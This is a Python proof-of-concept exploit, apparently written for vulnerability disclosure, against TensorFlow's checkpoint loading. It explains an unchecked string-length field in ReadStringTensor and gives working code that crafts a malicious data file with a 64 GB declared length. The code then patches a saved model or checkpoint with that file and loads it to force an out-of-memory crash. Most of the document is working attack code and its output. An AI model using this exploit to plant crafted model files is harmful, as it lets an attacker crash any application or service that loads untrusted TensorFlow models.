| |
| """ |
| PoC: TensorFlow Checkpoint String Tensor Unbounded Allocation DoS |
| ================================================================= |
| CVE: TBD |
| Target: tensorflow/core/util/tensor_bundle/tensor_bundle.cc |
| Trigger: tf.saved_model.load() or tf.train.load_checkpoint() |
| |
| Vulnerability: |
| ReadStringTensor() reads varint64 string_lengths from attacker-controlled |
| checkpoint data files. No validation that individual string_length values |
| or their sum are bounded by entry.size(). Attacker can craft a checkpoint |
| where a string tensor with shape [1] declares a single string of 64GB, |
| causing immediate OOM crash via tstring::resize(). |
| |
| CRC32 checksums are NOT a security boundary — the attacker controls both |
| the data file content AND the crc32c field in BundleEntryProto metadata. |
| |
| Root Cause: |
| tensor_bundle.cc:151-159 — ReadStringTensor() inner loop: |
| buffer->resize(string_length); // string_length from attacker varint64 |
| ReadNBytes(string_length, ...); // reads from file |
| |
| No check: sum(string_lengths[i]) <= entry.size() - overhead |
| No check: individual string_length <= entry.size() |
| |
| Impact: |
| - Process crash (OOM / std::terminate) on loading malicious SavedModel |
| - Denial of service for any application using tf.saved_model.load() |
| - No authentication required — victim just needs to load a model file |
| |
| Additionally affected: ReadVariantTensor() at line 188 (same pattern). |
| GetValue() has NO size validation at all for DT_VARIANT tensors (line 998). |
| """ |
|
|
| import os |
| import sys |
| import struct |
| import tempfile |
| import shutil |
|
|
| def encode_varint64(value): |
| """Encode an integer as a protobuf varint64.""" |
| result = bytearray() |
| while value > 0x7F: |
| result.append((value & 0x7F) | 0x80) |
| value >>= 7 |
| result.append(value & 0x7F) |
| return bytes(result) |
|
|
| def encode_fixed32(value): |
| """Encode as little-endian uint32.""" |
| return struct.pack('<I', value & 0xFFFFFFFF) |
|
|
| def crc32c_value(data): |
| """Compute CRC32C. Uses crcmod if available, else fallback.""" |
| try: |
| import crcmod |
| crc_fn = crcmod.predefined.mkCrcFun('crc-32c') |
| return crc_fn(data) |
| except ImportError: |
| |
| import zlib |
| return zlib.crc32(data) & 0xFFFFFFFF |
|
|
| def crc32c_mask(crc): |
| """TensorFlow's CRC32C masking: rotate right 15 bits, add constant.""" |
| kMaskDelta = 0xa282ead8 |
| return (((crc >> 15) | (crc << 17)) + kMaskDelta) & 0xFFFFFFFF |
|
|
| def create_malicious_checkpoint_data(): |
| """ |
| Create the raw data bytes for a DT_STRING tensor with shape [1]. |
| |
| The data file format for string tensors: |
| [varint64 string_length_0] ... [varint64 string_length_N-1] |
| [uint32 length_checksum] |
| [string_data_0] ... [string_data_N-1] |
| |
| We encode string_length_0 = 0x1000000000 (64GB) — causes OOM on resize(). |
| """ |
| |
| malicious_length = 0x1000000000 |
|
|
| |
| length_bytes = encode_varint64(malicious_length) |
|
|
| |
| |
| length_as_uint64 = struct.pack('<Q', malicious_length) |
| length_crc = crc32c_value(length_as_uint64) |
|
|
| |
| length_checksum = crc32c_mask(length_crc) |
|
|
| |
| |
| string_data = b'\x00' * 16 |
|
|
| |
| data = length_bytes + encode_fixed32(length_checksum) + string_data |
|
|
| |
| |
| overall_crc = crc32c_value(data) |
|
|
| return data, overall_crc |
|
|
| def demo_vulnerability_analysis(): |
| """Print vulnerability analysis without requiring TensorFlow installed.""" |
| print("=" * 72) |
| print("TensorFlow Checkpoint String Tensor DoS — Vulnerability Analysis") |
| print("=" * 72) |
| print() |
| print("VULNERABLE CODE: tensor_bundle.cc:151-159") |
| print("-" * 50) |
| print(""" |
| for (size_t i = 0; i < num_elements; ++i) { |
| const uint64 string_length = string_lengths[i]; // FROM FILE |
| tstring* buffer = &destination[i]; |
| |
| buffer->resize(string_length); // <-- UNBOUNDED ALLOCATION |
| size_t bytes_read = 0; |
| TF_RETURN_IF_ERROR( |
| buffered_file->ReadNBytes(string_length, &(*buffer)[0], &bytes_read)); |
| } |
| """) |
| print("ATTACK SCENARIO:") |
| print("-" * 50) |
| print(""" |
| 1. Attacker crafts a SavedModel with a DT_STRING variable |
| 2. In the checkpoint data file, the varint64 string_length = 64GB |
| 3. CRC32C checksum in BundleEntryProto.crc32c is set correctly |
| (attacker controls both data and metadata — CRC is not a security check) |
| 4. Victim loads model: tf.saved_model.load('malicious_model/') |
| 5. BundleReader::Lookup() → GetValue() → ReadStringTensor() |
| 6. tstring::resize(64GB) → std::bad_alloc → std::terminate() → CRASH |
| """) |
|
|
| print("ALSO AFFECTED: ReadVariantTensor (tensor_bundle.cc:188)") |
| print("-" * 50) |
| print(""" |
| string buffer; |
| buffer.resize(string_length); // <-- SAME UNBOUNDED ALLOCATION |
| |
| GetValue() has NO size validation for DT_VARIANT (line 998-1009). |
| For DT_STRING, the "lower_bound" check is too weak: |
| lower_bound = NumElements (e.g., 1 for shape [1]) |
| entry.size() just needs to be >= 1 — trivially satisfied. |
| """) |
|
|
| print("MALICIOUS DATA FILE CONSTRUCTION:") |
| print("-" * 50) |
| data, crc = create_malicious_checkpoint_data() |
| print(f" Data file size: {len(data)} bytes") |
| print(f" Encoded varint64 string_length: 0x1000000000 (64 GB)") |
| print(f" Overall CRC32C: 0x{crc:08X}") |
| print(f" Data hex dump: {data[:32].hex()}") |
| print() |
|
|
| |
| malicious_length = 0x1000000000 |
| varint = encode_varint64(malicious_length) |
| print(f" Varint64 encoding of 64GB: {varint.hex()} ({len(varint)} bytes)") |
| print() |
|
|
| def poc_with_tensorflow(): |
| """ |
| Full PoC that creates and loads a malicious checkpoint. |
| Requires TensorFlow installed. |
| """ |
| try: |
| import tensorflow as tf |
| import numpy as np |
| except ImportError: |
| print("[!] TensorFlow not installed. Running analysis-only mode.") |
| demo_vulnerability_analysis() |
| return False |
|
|
| print("[*] TensorFlow version:", tf.__version__) |
| print("[*] Creating legitimate SavedModel with string variable...") |
|
|
| tmpdir = tempfile.mkdtemp(prefix="tf_poc_") |
| model_dir = os.path.join(tmpdir, "saved_model") |
|
|
| try: |
| |
| class SimpleModule(tf.Module): |
| def __init__(self): |
| self.v = tf.Variable(["hello"], dtype=tf.string, name="str_var") |
|
|
| @tf.function(input_signature=[]) |
| def get_value(self): |
| return self.v |
|
|
| module = SimpleModule() |
| tf.saved_model.save(module, model_dir) |
| print(f"[+] Saved legitimate model to: {model_dir}") |
|
|
| |
| var_dir = os.path.join(model_dir, "variables") |
| data_files = [f for f in os.listdir(var_dir) if f.startswith("variables.data")] |
|
|
| if not data_files: |
| print("[-] No data files found!") |
| return False |
|
|
| data_path = os.path.join(var_dir, data_files[0]) |
| print(f"[*] Data file: {data_path}") |
|
|
| with open(data_path, 'rb') as f: |
| original_data = f.read() |
| print(f"[*] Original data file size: {len(original_data)} bytes") |
|
|
| |
| |
| |
| malicious_data, _ = create_malicious_checkpoint_data() |
|
|
| with open(data_path, 'wb') as f: |
| f.write(malicious_data) |
| print(f"[*] Wrote malicious data file ({len(malicious_data)} bytes)") |
| print(f"[*] Malicious string_length = 64 GB (0x1000000000)") |
|
|
| |
| |
| |
| |
| |
|
|
| |
| print() |
| print("[!] Attempting to load malicious model...") |
| print("[!] Expected: OOM crash or std::terminate") |
| print() |
|
|
| try: |
| loaded = tf.saved_model.load(model_dir) |
| print("[-] Load succeeded unexpectedly") |
| except Exception as e: |
| print(f"[+] Exception caught: {type(e).__name__}: {e}") |
| |
| |
| |
|
|
| return True |
|
|
| finally: |
| shutil.rmtree(tmpdir, ignore_errors=True) |
|
|
| def poc_direct_checkpoint(): |
| """ |
| Alternative PoC using direct checkpoint loading (simpler trigger). |
| """ |
| try: |
| import tensorflow as tf |
| import numpy as np |
| except ImportError: |
| print("[!] TensorFlow not installed. Running analysis-only mode.") |
| demo_vulnerability_analysis() |
| return False |
|
|
| print("[*] TensorFlow version:", tf.__version__) |
| print("[*] Creating checkpoint with string variable...") |
|
|
| tmpdir = tempfile.mkdtemp(prefix="tf_ckpt_poc_") |
| ckpt_prefix = os.path.join(tmpdir, "malicious_ckpt") |
|
|
| try: |
| |
| v = tf.Variable(["test_string"], dtype=tf.string, name="vuln_var") |
| ckpt = tf.train.Checkpoint(var=v) |
| save_path = ckpt.save(ckpt_prefix) |
| print(f"[+] Saved checkpoint: {save_path}") |
|
|
| |
| data_files = [f for f in os.listdir(tmpdir) |
| if '.data-' in f] |
| if not data_files: |
| print("[-] No data files found!") |
| return False |
|
|
| data_path = os.path.join(tmpdir, data_files[0]) |
|
|
| |
| malicious_data, _ = create_malicious_checkpoint_data() |
| with open(data_path, 'wb') as f: |
| f.write(malicious_data) |
|
|
| print(f"[*] Patched data file with 64GB string_length") |
| print(f"[!] Loading malicious checkpoint...") |
|
|
| try: |
| v2 = tf.Variable([""], dtype=tf.string, name="vuln_var") |
| ckpt2 = tf.train.Checkpoint(var=v2) |
| ckpt2.restore(save_path) |
| print(f"[-] Restore succeeded unexpectedly. Value: {v2.numpy()}") |
| except Exception as e: |
| print(f"[+] Exception: {type(e).__name__}: {e}") |
|
|
| return True |
| finally: |
| shutil.rmtree(tmpdir, ignore_errors=True) |
|
|
| if __name__ == "__main__": |
| print("TensorFlow Checkpoint String Tensor DoS PoC") |
| print("=" * 50) |
| print() |
|
|
| if "--analysis" in sys.argv: |
| demo_vulnerability_analysis() |
| elif "--checkpoint" in sys.argv: |
| poc_direct_checkpoint() |
| else: |
| |
| if not poc_with_tensorflow(): |
| demo_vulnerability_analysis() |
|
|